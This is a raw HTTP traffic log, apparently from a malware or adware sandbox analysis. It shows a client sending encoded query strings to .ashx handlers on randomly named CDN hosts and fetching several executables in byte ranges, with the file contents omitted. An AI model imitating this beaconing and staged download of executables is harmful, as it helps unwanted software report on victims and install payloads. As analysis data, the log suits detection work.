X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=N6dOqWm8Q94fEbCpbJoCfnRyfx22RDGQOvHY8s4Kk0v UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwV195BE3C 033SOzT6mB7 gBPEhRyyBD7D9H9 R1sVvTizl8eRMdimuBHdyxBIzcuHESN9FFCantS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:41 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF0ZnIhubsYOdECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=GFrjZskQvqNmS6nlSU/NThXyJo8GcS5h/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/gFOqBGDQz2TLS8QKBdwSe29z1KklHinBKYX3Ti/i3YMgCmKZYKupqaMfrJi9XFVPBHdyxBIzcuFiQ3FzN41YlI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1U0g9pFu/21ITrGUl3SHv B3WYfPFwahBc= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=AOb NGCDna90cn8dtkQxkERusJn/tOCq/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8FyBfkdHFoABfEKmHddSTlr6/u6Si5KcyuceLsPpRf2XIu YgVzu615FhjFLtNp8mV2lEuQvGIR/fg8uwYzFR1r8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /14314.ashx?e=bNFVvuIwcz4inMwQKODRlIqiqZmwl1PqIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGG Ruf1p/wWfUh 3ZGDmdW5pZis9f nTddyS4BuUDC9WTdXgG3d7dLtc8OkZQyb4w969Wi5JdYQNAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcbDfhe8VxCPz HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:44 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 0-249999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 500000-749999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1000000-1249999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 1500000-1749999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2000000-2249999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 2500000-2749999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3000000-3249999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=3500000-3749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 3500000-3749999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4000000-4249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4000000-4249999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=4500000-4749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 4500000-4749999/5107690

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1
Range: bytes=5000000-5107689
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: otr4vhc-1ghhyl1c.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 10 Sep 2015 07:25:43 GMT
Content-Type: application/octet-stream
Content-Length: 107690
Connection: keep-alive
x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv
x-amz-request-id: A7561DB98695E903
Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT
ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 5000000-5107689/5107690

<<< skipped >>>

GET /SetterExeV18.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d11sfnc01fj8ag.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Tue, 28 Jul 2015 20:29:52 GMT
Accept-Ranges: bytes
ETag: "a670962874c9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 29 Aug 2015 07:03:14 GMT
Content-Range: bytes 250000-499999/520704
Age: 2540
X-Cache: Hit from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: V_r3jESToruazsI3x-84kJKtfpEUIqmlmEr0PRtp0nQs2UFsqvuVKg==

<<< skipped >>>

GET /12466.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqcnIzPjk7XGtW1B5cJyD8WHLb9RQzbrixrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTHRdsGMkr9o5Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:37 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /12466.ashx?e=LCnUzM5l8JKBkxMrsxJdJjRFyso9cgVYMKeV1roKInbCigHpURgZK3sc7hbJtTJH20qHT6WNWM6mY5NIfEeUIuhJ2EFls9mhQI32H5tXX1XUaDgXp2QHNdR8GDCHWpWtE5S9J1faKqfhTy6irisLyMLwVoAmU3rnUzRVzAnl uFqmlgchhBdgwSPF2iAJtcmUJIT4CY/7AXh9X2HG3hgOnl431dc355ZX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8WY515bwKb4/A== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /12466.ashx?e=k64GogClQtV0cn8dtkQxkPtwZYyWBm3A/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYjkTFPZ1 JDTyBfkdHFoABciDxPRY4o5upR90anDedSCd9HiXvVRh4g0C52NwzQxay5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:41 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /t.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/jJX2BNWr5ZmwkqgaQEwGAs IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: qko863p80c-mzxspesu.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....



GET /t.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/jJX2BNWr5ZmwkqgaQEwGAs IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: qko863p80c-mzxspesu.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk....



GET /t.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/jJX2BNWr5ZmwkqgaQEwGAs IILilpWF0klpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: qko863p80c-mzxspesu.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 10 Sep 2015 07:25:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13
Connection: keep-alive
Cache-Control: private,no-cache, no-store
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
abfgshdgfjhsk


GET /smw121634dp.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 09:28:55 GMT
Content-Range: bytes 0-249999/3359008
X-Cache: RefreshHit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 54cndzdar9pouT6c-jA8F1urRi91dnKS0CZgNwdZfZy4XTir7Exl-g==
<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1
Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 09:28:55 GMT
Content-Range: bytes 500000-749999/3359008
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: OXZRMGMjm0F86g7FXr0j-eBbjchQctLXw3bdnty6KxoQ3Uhu4p2U0g==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1
Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 09 Sep 2015 18:04:26 GMT
Age: 1
Content-Range: bytes 1000000-1249999/3359008
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e_U86qhL1j0U7uN9NEIIqqlsV-RjMaocasCwarHVkwfsNKdZ5HGK8w==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1
Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 16:56:59 GMT
Content-Range: bytes 1500000-1749999/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: E_UlS9HfhRQmJjkHrbcZqxcvWwaSo-RfCAnRQ7M7OehAtyOojV9M5Q==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1
Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 16:56:59 GMT
Content-Range: bytes 2250000-2499999/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: EVeV9sV1XXtA1lhXkH7lTD-GaC-D5jB3ghQdRf4hdVEiZKU_e-KDPw==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1
Range: bytes=2750000-2999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 16:56:59 GMT
Content-Range: bytes 2750000-2999999/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: z-H82M_4G415sHNGiDi-VcYC2uBILm1UUnDfNdgawWQ-axGA3ynppQ==

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1
Range: bytes=3250000-3359007
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 109008
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 07 Sep 2015 17:05:21 GMT
Content-Range: bytes 3250000-3359007/3359008
Age: 1
X-Cache: Hit from cloudfront
Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 54hvbuWWzoLO70b6d7Z6lWGDdm0P7uJPGfEFN5w2Why4Mzv6mYLt3A==

<<< skipped >>>

GET /p.ashx?e=I6hFHi0H7G9mS6nlSU/NTuiRTIWym4 0QVpVqTl5/e4gLxC0aXqYrfauHCM4PoUS28zA03xwxN7DRdbCExQ3XkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mdulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hfCt1Zpc0u8z HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 10 Sep 2015 07:25:50 GMT
X-Cache: Miss from cloudfront
Via: 1.1 e89c67951b2bc58773e3664c08702f34.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _pl_j-7mThaJDdigSOJIXkzCS6pnbJ68V3HiOpm5h8XxFa--G-6rIA==


